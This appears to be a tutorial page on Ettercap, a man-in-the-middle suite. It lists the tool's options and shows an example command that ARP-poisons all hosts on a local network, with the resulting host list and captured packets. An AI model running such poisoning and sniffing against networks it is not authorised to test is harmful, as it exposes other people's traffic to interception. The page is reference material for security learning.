Ettercap

Description

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

Usage

Syntax

ettercap [OPTIONS] [TARGET1] [TARGET2]

Options

  -i, --iface <iface>         use this network interface
  -I, --liface                show all the network interfaces
  -Y, --secondary <ifaces>    list of secondary network interfaces
  -n, --netmask <netmask>     force this <netmask> on iface
  -A, --address <address>     force this local <address> on iface
  -P, --plugin <plugin>       launch this <plugin>
  -F, --filter <file>         load the filter <file> (content filter)
  -z, --silent                do not perform the initial ARP scan
  -j, --load-hosts <file>     load the hosts list from <file>
  -k, --save-hosts <file>     save the hosts list to <file>
  -W, --wifi-key <wkey>       use this key to decrypt wifi packets (wep or wpa)
  -a, --config <config>       use the alterative config file <config>

Example

cyborg@cyborg:~$ sudo ettercap -Tq -i eth0 -M arp:remote /// /// -w cap.pcap 

ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team

Listening on:
  eth0 -> 00:E0:4C:37:00:93
	  192.168.1.6/255.255.255.0
	  fe80::2e0:4cff:fe37:93/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  33 plugins
  42 protocol dissectors
  57 ports monitored
16074 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

9 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : ANY (all the hosts in the list)

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help


Inline help:

 [vV]      - change the visualization mode
 [pP]      - activate a plugin
 [fF]      - (de)activate a filter
 [lL]      - print the hosts list
 [oO]      - print the profiles list
 [cC]      - print the connections list
 [sS]      - print interfaces statistics
 [<space>] - stop/cont printing packets
 [qQ]      - quit



Hosts list:

1)	fe80::1	10:FE:ED:B7:A5:42
2)	192.168.1.1	10:FE:ED:B7:A5:42
3)	fe80::cca5:e8db:6058:1843	74:DE:2B:C3:A0:2F
4)	192.168.1.2	3C:97:0E:B6:7F:E5
5)	192.168.1.5	74:DE:2B:C3:A0:2F
6)	192.168.1.7	94:EB:CD:4A:48:5C
7)	192.168.1.18	C8:F7:33:77:1A:BE
8)	fe80::cdf0:7093:3117:47e5	C8:F7:33:77:1A:BE
9)	192.168.1.40	10:78:D2:2B:8F:E1
10)	254.128.0.0	00:E0:4C:37:00:93



Packet visualization restarted...


Mon Nov 16 14:00:41 2015
TCP  162.144.208.86:80 --> 192.168.1.40:55353 | A

.A.....\.g.\<..c.`|..|X.k..=..e..M....>..:.J.Y.
........n.....;nF{*....g.YNYM-vi[*.ON.....:..\....{.......^..a..h.>.......&..yH..*.........e>........................H....f...y/n.GQ..)..wt.).......<7.........".k..?Dy.f.Y..H.6...<..C...g2...D~...]...h.v>.]..bmpq..=...{=G>g.....(.....di...`-s..^..\h....ei.)s.(.....J"..1.o....i?m..jX..V4.......m..|...........y~......
6t...........o...'.......4....RkvDn........m....GOYRM*....+......[....K/.*s...fi
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?